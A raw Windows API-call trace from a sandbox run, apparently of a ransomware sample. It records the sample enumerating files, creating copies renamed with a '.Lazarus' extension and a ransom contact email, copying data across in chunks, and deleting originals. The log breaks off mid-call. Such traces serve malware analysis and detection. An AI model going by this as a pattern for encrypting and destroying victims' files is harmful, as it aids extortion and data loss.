HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0072.336] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327ef70*=0x980, lpOverlapped=0x0) returned 1 [0072.336] GetLastError () returned 0x0 [0072.336] SetLastError (dwErrCode=0x0) [0072.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d738 | out: hHeap=0x20000) returned 1 [0072.336] GetLastError () returned 0x0 [0072.336] SetLastError (dwErrCode=0x0) [0072.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0072.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d750 | out: hHeap=0x20000) returned 1 [0072.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0072.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e440 | out: hHeap=0x20000) returned 1 [0072.336] CloseHandle (hObject=0x418) returned 1 [0072.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0072.339] CloseHandle (hObject=0x410) returned 1 [0072.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0072.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0072.340] AreFileApisANSI () returned 1 [0072.340] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0072.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71a98 [0072.340] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x71a98, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 45 [0072.340] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.341] GetFileType (hFile=0x410) returned 0x1 [0072.341] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0072.342] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0072.342] GetLastError () returned 0xb7 [0072.342] SetLastError (dwErrCode=0xb7) [0072.342] WriteFile (in: hFile=0x410, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0072.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0072.343] CloseHandle (hObject=0x410) returned 1 [0072.343] AreFileApisANSI () returned 1 [0072.343] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0072.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0072.343] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 45 [0072.343] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml")) returned 1 [0072.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0072.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0072.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0072.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0072.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0072.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0072.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0072.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d708 | out: hHeap=0x20000) returned 1 [0072.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0072.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0072.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bae0 | out: hHeap=0x20000) returned 1 [0072.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0072.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0072.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0072.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0072.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0072.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0072.345] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.345] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.345] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x1, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0072.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0072.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0072.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0072.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0072.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0072.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0072.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0072.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0072.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0072.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0072.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0072.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0072.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0072.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0072.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0072.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0072.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0072.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0072.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0072.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0072.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0072.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0072.345] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.345] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.345] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.345] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0072.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0072.345] AreFileApisANSI () returned 1 [0072.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\2070\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\2070\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0072.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0072.346] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.346] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0072.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0072.346] AreFileApisANSI () returned 1 [0072.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0072.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0072.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 46 [0072.346] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.346] GetFileType (hFile=0x410) returned 0x1 [0072.346] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.346] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0072.346] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0072.347] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0072.347] CloseHandle (hObject=0x410) returned 1 [0072.347] AreFileApisANSI () returned 1 [0072.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0072.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71758 [0072.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 46 [0072.347] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.347] GetFileType (hFile=0x410) returned 0x1 [0072.347] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0072.347] CloseHandle (hObject=0x410) returned 1 [0072.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0072.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0072.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0072.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0072.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0072.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0072.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0072.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0072.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0072.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0072.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0072.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0072.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0072.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0072.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0072.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0072.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0072.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0072.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0072.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0072.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0072.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0072.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0072.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0072.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0072.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0072.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0072.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0072.348] AreFileApisANSI () returned 1 [0072.348] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0072.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x715b8 [0072.348] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 46 [0072.348] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\2070\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958)) returned 1 [0072.349] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.349] AreFileApisANSI () returned 1 [0072.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0072.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0072.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0072.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0072.349] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0072.349] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0072.349] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0072.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0072.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0072.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0072.349] GetLastError () returned 0x0 [0072.349] SetLastError (dwErrCode=0x0) [0072.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e0d8 [0072.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0072.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c288 [0072.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6c0 [0072.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6f0 [0072.349] GetLastError () returned 0x0 [0072.349] SetLastError (dwErrCode=0x0) [0072.349] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0072.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0072.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71bd0 [0072.349] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0072.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a2d0 [0072.349] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0072.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0072.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0072.350] AreFileApisANSI () returned 1 [0072.350] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 108 [0072.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd8) returned 0x80a30 [0072.350] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a2d0, cbMultiByte=-1, lpWideCharStr=0x80a30, cchWideChar=108 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2070\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 108 [0072.350] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.350] GetFileType (hFile=0x410) returned 0x1 [0072.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0072.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0072.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0072.350] AreFileApisANSI () returned 1 [0072.350] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0072.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71620 [0072.350] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 46 [0072.350] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.351] GetFileType (hFile=0x418) returned 0x1 [0072.351] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.351] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0072.351] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.351] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.351] GetLastError () returned 0x0 [0072.351] SetLastError (dwErrCode=0x0) [0072.351] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.351] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.351] GetLastError () returned 0x0 [0072.351] SetLastError (dwErrCode=0x0) [0072.351] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.351] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.351] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0072.351] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0072.353] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0072.353] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0072.353] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8e440 [0072.353] GetLastError () returned 0x0 [0072.353] SetLastError (dwErrCode=0x0) [0072.354] GetLastError () returned 0x0 [0072.354] SetLastError (dwErrCode=0x0) [0072.354] GetLastError () returned 0x0 [0072.354] SetLastError (dwErrCode=0x0) [0072.354] GetLastError () returned 0x0 [0072.354] SetLastError (dwErrCode=0x0) [0072.354] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.354] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.355] GetLastError () returned 0x0 [0072.355] SetLastError (dwErrCode=0x0) [0072.355] GetLastError () returned 0x0 [0072.356] SetLastError (dwErrCode=0x0) [0072.356] GetLastError () returned 0x0 [0072.356] SetLastError (dwErrCode=0x0) [0072.356] GetLastError () returned 0x0 [0072.356] SetLastError (dwErrCode=0x0) [0072.356] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.356] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, 